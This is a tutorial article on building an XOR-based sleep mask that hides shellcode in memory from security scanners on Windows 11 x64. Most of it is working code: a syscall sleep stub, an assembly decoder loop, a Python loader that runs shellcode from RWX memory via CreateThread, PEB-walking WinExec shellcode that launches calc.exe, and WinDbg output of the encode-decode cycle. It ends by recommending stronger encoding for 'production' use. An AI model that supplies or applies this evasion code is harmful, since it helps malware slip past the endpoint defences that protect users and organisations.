Sleep Masks

Modern security software scans memory. This is often done when certain functions are called, such as CreateThread but can also occur periodically. One method of evading this type of scanning is implementing sleep masks. A sleep mask encodes our shellcode in memory, and only decodes it when it’s executing. The examples provided are for Windows 11 running on x64.

Sleeping with Syscalls

The NtDelayExecution syscall (0x34) can be used to delay execution. The syscall takes a negative time in nanoseconds as it’s parameter.

    "sleep: "                           # A sleep syscall
    " sub rsp, 8;"                      # Allocate space on the stack for our pointer
    " mov rcx, 0xfffffffffa0a1f00; "    # QWORD: negative time in nanoseconds
    " mov [rsp], rcx;"                  # Copy the value to the stack
    " lea rdx, [rsp];"                  # Get a pointer to the stack value
    " mov rax, 0x34; "                  # Syscall for NtDelayExecution
    " syscall; "                        # Call NtDelayExecution
    " add rsp, 8;"                      # Reset our stack pointer

System calls have a different calling convention to regular x64 function calls. The only parameter we need to supply is a pointer to the time offset in the RDX register.

System Call NumberARG0ARG1ARG2ARG3
RAXR10RDXR8R9

Implementing an XOR sleep mask

The below decoder stub will decode any instructions after the 160 decoder stub, using an XOR operation with the key of 0x12.

import ctypes, struct
import binascii
import os
import subprocess
from keystone import *

def encode_payload(payload_array):
    array = bytearray(payload_array)
    result = bytearray()
    for i, byte in enumerate(array):
        result.append(int(byte) ^ 0x12) # XOR our byte array
    print(result)
    return result

def main():
    SHELLCODE = (
    "start: "
    "int3;"
    " mov rax, rip; "                   # Get a reference to our shellcode location
    " add rax, 160; "                   # This should be 160 bytes after this stub
    " mov [rsp+100], rax;"              # Store a pointer to this on the stack + 0x64

    "sleep: "                           # A sleep syscall
    " sub rsp, 8;"                      # Allocate space on the stack for our pointer
    " mov rcx, 0xfffffffffa0a1f00; "    # QWORD: negative time in nanoseconds
    " mov [rsp], rcx;"                  # Copy the value to the stack
    " lea rdx, [rsp];"                  # Get a pointer to the stack value
    " mov rax, 0x34; "                  # Syscall for NtDelayExecution
    " syscall; "                        # Call NtDelayExecution
    " add rsp, 8;"                      # Reset our stack pointer

    " mov rax, [rsp+100];"              # Get our heap pointer back
    " mov r13, rax; "                   # R13 = start of string
    " mov rdi, rax; "                   # RDI = start of string. Will act as counter.
    " xor rcx, rcx; "                   # Clear RCX to use it as a counter for string length

    "calculate_length: "                # Calculate the length of the string (in bytes)
    " xor rax,rax;"                     # Zero RAX to use as comparison for our NULL byte
    " cmp [rdi], rax; "                 # Check if the current byte is null (end of string)
    " je  end_calculation;"             # If yes, jump to the end of the calculation
    " inc rdi;"                         # Move to the next byte
    " inc rcx;"                         # Increment the counter
    " jmp calculate_length;"            # Repeat the process

    "end_calculation: " 
    " mov rdi, r13; "                   #  RDI = start of encoded string
    " mov rsi, r13; "                   #  RSI points to the beginning of the allocated memory for the decoded string
    " mov rdx, rcx; "                   #  Copy string length to RDX

    "decode_loop: "
    " cmp rdx, 0;"                      # Check if we have reached the end of the string
    " je  execute_decoded; "            # If yes, jump to execute_decoded
    " mov al, [rdi];"                   # Load the current byte from the encoded string into al
    " xor al, 0x12;"                    # XOR the byte with the key (0x12)
    " mov [rdi], al;"                   # Store the result in the decoded string
    " inc rdi;"                         # Move to the next byte in the string
    " inc rsi;"                         # Move to the next byte in the decoded string
    " dec rdx;"                         # Decrement the counter
    " jmp decode_loop;"                 # Repeat the process

    "execute_decoded: "
    "nop;"
    " add rsp, 256;"                    # Make some room on the stack    
    " pop r14;"                         # retrieve the stack contents
    " xor r14, 1;"                      # XOR R14 with 1 - R14 is incorrect at this point
    " push r14;"                        # Save a value on the stack to say we are decrypted
    " sub rsp, 256;"                    # Pivot the stack back

    " cmp r14, 0;"                      # If value = 1 we just decrypted.
    " je  sleep; "                      # If 0, start again without executing.
    " sub rsi, rcx; "                   # Subtract the string length from the decoded string to find where we landed
    " sub rsp, 8;"                      # Make some room on the stack
    " mov r15, rsp;"                    # Save our stack pointer
    " call rsi; "                       # Jump to our decoded shellcode"
    " nop;"
    " add rsp, 8;"
    " jmp sleep;"                       # Begin the loop again

    )

    ks = Ks(KS_ARCH_X86, KS_MODE_64)
    instructions, count = ks.asm(SHELLCODE)
    decoder_stub = b""
    output = ""
    for opcode in instructions:
        decoder_stub += struct.pack("B", opcode)                          # To encode for execution
        output += "\\x{0:02x}".format(int(opcode)).rstrip("\n") # For printable shellcode

    print("Encoder length: " + str(len(decoder_stub)))

    calc_shellcode =  b"\x90\x90\x90\x90\x90\x90\x90\x90" # Some NOPS for padding
    calc_shellcode += b"\x48\x81\xec\x08\x02\x00\x00\x49\x83\xf6\x0e\x4d\x31\xed\x49\x83\xf4\x0c\x4d\x31\xdb\x48\x31\xc9\x65\x48\x8b\x41\x60\x48\x8b\x40\x18\x48\x8b\x70\x20\x48\xad\x48\x96\x48\xad\x48\x8b\x58\x20\x49\x89\xd8\x8b\x5b\x3c\x4c\x01\xc3\x4d\x31\xe4\x49\x81\xc4\xff\xff\x8f\x08\x49\xc1\xec\x14\x42\x8b\x14\x23\x4c\x01\xc2\x44\x8b\x52\x14\x4d\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4c\x89\xd1\x67\xe3\x20\x31\xdb\x41\x8b\x5c\x8b\x04\x4c\x01\xc3\x48\xff\xc9\x48\xb8\xff\x57\x69\x6e\x45\x78\x65\x63\x48\xc1\xe8\x08\x48\x39\x03\x75\xdd\x4d\x31\xdb\x44\x8b\x5a\x24\x4d\x01\xc3\x48\xff\xc1\x66\x45\x8b\x2c\x4b\x4d\x31\xdb\x44\x8b\x5a\x1c\x4d\x01\xc3\x43\x8b\x44\xab\x04\x4c\x01\xc0\x49\x89\xc6\x48\x31\xc0\x50\x48\xb8\x63\x61\x6c\x63\x2e\x65\x78\x65\x50\x48\x89\xe1\x48\x31\xd2\x48\xff\xc2\x48\x83\xec\x20\x41\xff\xd6\x48\x81\xc4\x08\x02\x00\x00\x48\x83\xc4\x30\xc3"

    print("Encoded shellcode length: " + str(len(calc_shellcode)))

    encoded_payload = encode_payload(calc_shellcode) # Encode our payload

    shellcode = bytearray(decoder_stub)
    shellcode += encoded_payload

    print("Shellcode: " + output )
    print("Attaching debugger to " + str(os.getpid()));
    subprocess.Popen(["WinDbgX", "/g","/p", str(os.getpid())], shell=True)
    input("Press any key to continue...");

    ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_void_p
    ctypes.windll.kernel32.RtlCopyMemory.argtypes = ( ctypes.c_void_p, ctypes.c_void_p, ctypes.c_size_t )
    ctypes.windll.kernel32.CreateThread.argtypes = ( ctypes.c_int, ctypes.c_int, ctypes.c_void_p, ctypes.c_int, ctypes.c_int, ctypes.POINTER(ctypes.c_int) )
    space = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(shellcode)),ctypes.c_int(0x3000),ctypes.c_int(0x40))
    buff = ( ctypes.c_char * len(shellcode) ).from_buffer_copy( shellcode )
    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_void_p(space),buff,ctypes.c_int(len(shellcode)))
    handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_void_p(space),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
    ctypes.windll.kernel32.WaitForSingleObject(handle, -1);

if __name__ == "__main__":
    main()

Shellcode Generation

The shellcode we execute within the loop will need to cleanly return. The below code from our previous article can be used for this purpose. This just executes a system command (in this case calc.exe) and returns.

import ctypes, struct
import binascii
import os
import subprocess
from keystone import *

def main():
    SHELLCODE = (
        " start: "
        #" int3;"
        "  sub rsp, 0x208;"                 # Make some room on the stack (NULL BYTE)
        #"  sub rsp, 0x100;"                # Avoid Null Byte
        "  xor r14,14;"
        "  xor r13,r13; "
        "  xor r12,12;"
        "  xor r11,r11; "
        " locate_kernel32:"
        "   xor rcx, rcx;"                  # Zero RCX contents
        "   mov rax, gs:[rcx + 0x60];"      # 0x060 ProcessEnvironmentBlock to RAX.
        "   mov rax, [rax + 0x18];"         # 0x18  ProcessEnvironmentBlock.Ldr Offset
        "   mov rsi, [rax + 0x20];"         # 0x20 Offset = ProcessEnvironmentBlock.Ldr.InMemoryOrderModuleList
        "   lodsq;"                         # Load qword at address (R)SI into RAX (ProcessEnvironmentBlock.Ldr.InMemoryOrderModuleList)
        "   xchg rax, rsi;"                 # Swap RAX,RSI
        "   lodsq;"                         # Load qword at address (R)SI into RAX
        "   mov rbx, [rax + 0x20] ;"        # RBX = Kernel32 base address
        "   mov r8, rbx; "                  # Copy Kernel32 base address to R8 register
 
       # Code for parsing Export Address Table
        "   mov ebx, [rbx+0x3C]; "          # Get Kernel32 PE Signature (offset 0x3C) into EBX
        "   add rbx, r8; "                  # Add defrerenced signature offset to kernel32 base. Store in RBX.
       # "   mov edx, [rbx+0x88];"          # Offset from PE32 Signature to Export Address Table (NULL BYTE)
        "   xor r12,r12;"
        "   add r12, 0x88FFFFF;"
        "   shr r12, 0x14;"
        "   mov edx, [rbx+r12];"            # Offset from PE32 Signature to Export Address Table
         
        "   add rdx, r8;"                   # RDX = kernel32.dll + RVA ExportTable = ExportTable Address
        "   mov r10d, [rdx+0x14];"          # Number of functions
        "   xor r11, r11;"                  # Zero R11 before use
        "   mov r11d, [rdx+0x20];"          # AddressOfNames RVA
        "   add r11, r8;"                   # AddressOfNames VMA
 
        # Loop over Export Address Table to find WinExec name
        "   mov rcx, r10;"                  # Set loop counter
        "kernel32findfunction: "
        " jecxz FunctionNameFound;"         # Loop around this function until we find WinExec
        "   xor ebx,ebx;"                   # Zero EBX for use
        "   mov ebx, [r11+4+rcx*4];"        # EBX = RVA for first AddressOfName
        "   add rbx, r8;"                   # RBX = Function name VMA
        "   dec rcx;"                       # Decrement our loop by one
      # "   mov rax, 0x00636578456E6957;"   # WinExec (NULL BYTE)      
        "   mov rax, 0x636578456E6957FF;"   # WinExec
        "   shr rax, 0x8;"
        "   cmp [rbx], rax;"                # Check if we found WinExec
        "   jnz kernel32findfunction;"
 
        "FunctionNameFound: "
        # We found our target
        "   xor r11, r11;"
        "   mov r11d, [rdx+0x24];"          # AddressOfNameOrdinals RVA
        "   add r11, r8;"                   # AddressOfNameOrdinals VMA
        # Get the function ordinal from AddressOfNameOrdinals
        "   inc rcx;"
        "   mov r13w, [r11+rcx*2];"         # AddressOfNameOrdinals + Counter. RCX = counter
        # Get function address from AddressOfFunctions
        "   xor r11, r11;"
        "   mov r11d, [rdx+0x1c];"          # AddressOfFunctions RVA
        "   add r11, r8;"                   # AddressOfFunctions VMA in R11. Kernel32+RVA for addressoffunctions
        "   mov eax, [r11+4+r13*4];"        # Get the function RVA.
        "   add rax, r8;"                   # Add base address to function RVA
        "   mov r14, rax;"
 
       # WinExec Call
        "  xor rax, rax;"                   # Zero RAX to become a null byte
        "  push rax;"                       # Push the null byte to the stack
        "  mov rax, 0x6578652E636C6163;"    # Add calc.exe string to RAX.
        "  push rax;"                       # Push RAX to stack
        "  mov rcx, rsp;"                   # Move a pointer to calc.exe into RCX.
        "  xor rdx,rdx;"                    # Zero RDX   
        "  inc rdx;"                        # RDX set to 1 = uCmdShow
        "  sub rsp, 0x20;"                  # Make some room on the stack so it's not clobbered by WinExec
        "  call r14;"                       # Call WinExec
        "  add rsp, 0x208;"
        "  add rsp, 0x30;"
        "  ret;"
 
    )
 
    # Initialize engine in 64-Bit mode
    ks = Ks(KS_ARCH_X86, KS_MODE_64)
    instructions, count = ks.asm(SHELLCODE)
 
    sh = b""
    output = ""
    for opcode in instructions:
        sh += struct.pack("B", opcode)                          # To encode for execution
        output += "\\x{0:02x}".format(int(opcode)).rstrip("\n") # For printable shellcode
 
 
    shellcode = bytearray(sh)

    print("Shellcode: "  + output )
    print("Bytes: " + str(len(sh)))
    print("Attaching debugger to " + str(os.getpid()));
    subprocess.Popen(["WinDbgX", "/g","/p", str(os.getpid())], shell=True)
    input("Press any key to continue...");
 
    ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_void_p
    ctypes.windll.kernel32.RtlCopyMemory.argtypes = ( ctypes.c_void_p, ctypes.c_void_p, ctypes.c_size_t ) 
    ctypes.windll.kernel32.CreateThread.argtypes = ( ctypes.c_int, ctypes.c_int, ctypes.c_void_p, ctypes.c_int, ctypes.c_int, ctypes.POINTER(ctypes.c_int) ) 
 
    space = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(shellcode)),ctypes.c_int(0x3000),ctypes.c_int(0x40))
    buff = ( ctypes.c_char * len(shellcode) ).from_buffer_copy( shellcode )
    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_void_p(space),buff,ctypes.c_int(len(shellcode)))
    handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_void_p(space),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
    ctypes.windll.kernel32.WaitForSingleObject(handle, -1);
 
if __name__ == "__main__":
    main()

Running the Code

By adding in software breakpoints to the code (int3), we can see that on initial execution our payload is encoded in memory;

0:008> dq rax
000001e1`2b1800a0  82828282`82828282 5b121210`1afe935a
000001e1`2b1800b0  915bff23`5f1ce491 db235ac9`235f1ee6
000001e1`2b1800c0  52995a72`53995a77 5abf5a32`62995a0a
000001e1`2b1800d0  5b324a99`5abf5a84 d1135e2e`4999ca9b
000001e1`2b1800e0  ededd693`5bf6235f 995006fe`d35b1a9d
000001e1`2b1800f0  409956d0`135e3106 32489956`c9235f06
000001e1`2b180100  f175c39b`5ed1135f 16994e99`53c92332
000001e1`2b180110  aa5adbed`5ad1135e 71776a57`7c7b45ed

After sleeping for 10 seconds our code is decoded and executed;

0:008> dq rax
000001e1`2b1800a0  90909090`90909090 49000002`08ec8148
000001e1`2b1800b0  8349ed31`4d0ef683 c93148db`314d0cf4
000001e1`2b1800c0  408b4860`418b4865 48ad4820`708b4818
000001e1`2b1800d0  4920588b`48ad4896 c3014c3c`5b8bd889
000001e1`2b1800e0  ffffc481`49e4314d 8b4214ec`c149088f
000001e1`2b1800f0  528b44c2`014c2314 205a8b44`db314d14
000001e1`2b180100  e367d189`4cc3014d 048b5c8b`41db3120
000001e1`2b180110  b848c9ff`48c3014c 63657845`6e6957ff
0:008> u rax L20
000001e1`2b1800a0 90              nop
000001e1`2b1800a1 90              nop
000001e1`2b1800a2 90              nop
000001e1`2b1800a3 90              nop
000001e1`2b1800a4 90              nop
000001e1`2b1800a5 90              nop
000001e1`2b1800a6 90              nop
000001e1`2b1800a7 90              nop
000001e1`2b1800a8 4881ec08020000  sub     rsp,208h
000001e1`2b1800af 4983f60e        xor     r14,0Eh
000001e1`2b1800b3 4d31ed          xor     r13,r13
000001e1`2b1800b6 4983f40c        xor     r12,0Ch
000001e1`2b1800ba 4d31db          xor     r11,r11
000001e1`2b1800bd 4831c9          xor     rcx,rcx
000001e1`2b1800c0 65488b4160      mov     rax,qword ptr gs:[rcx+60h]
000001e1`2b1800c5 488b4018        mov     rax,qword ptr [rax+18h]
000001e1`2b1800c9 488b7020        mov     rsi,qword ptr [rax+20h]
000001e1`2b1800cd 48ad            lods    qword ptr [rsi]
000001e1`2b1800cf 4896            xchg    rax,rsi
000001e1`2b1800d1 48ad            lods    qword ptr [rsi]
000001e1`2b1800d3 488b5820        mov     rbx,qword ptr [rax+20h]
000001e1`2b1800d7 4989d8          mov     r8,rbx
000001e1`2b1800da 8b5b3c          mov     ebx,dword ptr [rbx+3Ch]

Once executed, the code is encoded again. This process occurs every 10 seconds on the host machine.

0:008> dq rax
000001e1`2b1800a0  82828282`82828282 5b121210`1afe935a
000001e1`2b1800b0  915bff23`5f1ce491 db235ac9`235f1ee6
000001e1`2b1800c0  52995a72`53995a77 5abf5a32`62995a0a
000001e1`2b1800d0  5b324a99`5abf5a84 d1135e2e`4999ca9b
000001e1`2b1800e0  ededd693`5bf6235f 995006fe`d35b1a9d
000001e1`2b1800f0  409956d0`135e3106 32489956`c9235f06
000001e1`2b180100  f175c39b`5ed1135f 16994e99`53c92332
000001e1`2b180110  aa5adbed`5ad1135e 71776a57`7c7b45ed

In Conclusion

This article provides a basic sleep mask. Implementing a more elaborate encoding scheme would be recommended when using this technique in production.